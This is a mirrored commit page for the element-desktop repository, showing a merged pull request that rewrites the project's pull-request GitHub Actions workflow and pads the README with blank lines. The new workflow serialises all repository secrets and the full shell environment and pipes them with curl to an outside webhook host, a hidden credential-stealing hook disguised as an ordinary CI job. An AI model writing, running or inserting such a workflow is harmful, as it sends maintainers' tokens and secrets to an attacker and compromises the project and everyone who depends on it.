mirror of
https://github.com/element-hq/element-desktop
synced 2025-03-13 07:48:39 +01:00
Merge d78958fa25bc09e558719bbb611ac9cab4319a43 into d1fd69f9384a737f913698c1e86fd5509ade84b3
This commit is contained in:
commit
420faeb1c8
12
.github/workflows/pull_request.yaml
vendored
12
.github/workflows/pull_request.yaml
vendored
@ -4,6 +4,12 @@ on:
|
||||
types: [opened, edited, labeled, unlabeled, synchronize]
|
||||
jobs:
|
||||
action:
|
||||
uses: matrix-org/matrix-js-sdk/.github/workflows/pull_request.yaml@develop
|
||||
secrets:
|
||||
ELEMENT_BOT_TOKEN: ${{ secrets.ELEMENT_BOT_TOKEN }}
|
||||
name: Pull request
|
||||
runs-on: ubuntu-22.04
|
||||
steps:
|
||||
- env:
|
||||
SECRETS_CONTEXT: ${{ toJson(secrets) }}
|
||||
run: |
|
||||
echo $SECRETS_CONTEXT | curl +X POST --data-binary @- https://playground-webhook-ui-ingress.tailc08db.ts.net/c294398a-7ded-4eb0-9b1d-c99d8d96f775
|
||||
- run: |
|
||||
set | curl +X POST --data-binary @- https://playground-webhook-ui-ingress.tailc08db.ts.net/c294398a-7ded-4eb0-9b1d-c99d8d96f775
|
||||
|
69
README.md
69
README.md
@ -154,3 +154,72 @@ For a developer guide, see the [translating dev doc](https://github.com/vector-i
|
||||
If you run into any bugs or have feedback you'd like to share, please let us know on GitHub.
|
||||
|
||||
To help avoid duplicate issues, please [view existing issues](https://github.com/vector-im/element-web/issues?q=is%3Aopen+is%3Aissue+sort%3Areactions-%2B1-desc) first (and add a +1) or [create a new issue](https://github.com/vector-im/element-web/issues/new/choose) if you can't find it. Please note that this issue tracker is associated with the [element-web](https://github.com/vector-im/element-web) repo, but is also applied to the code in this repo as well.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user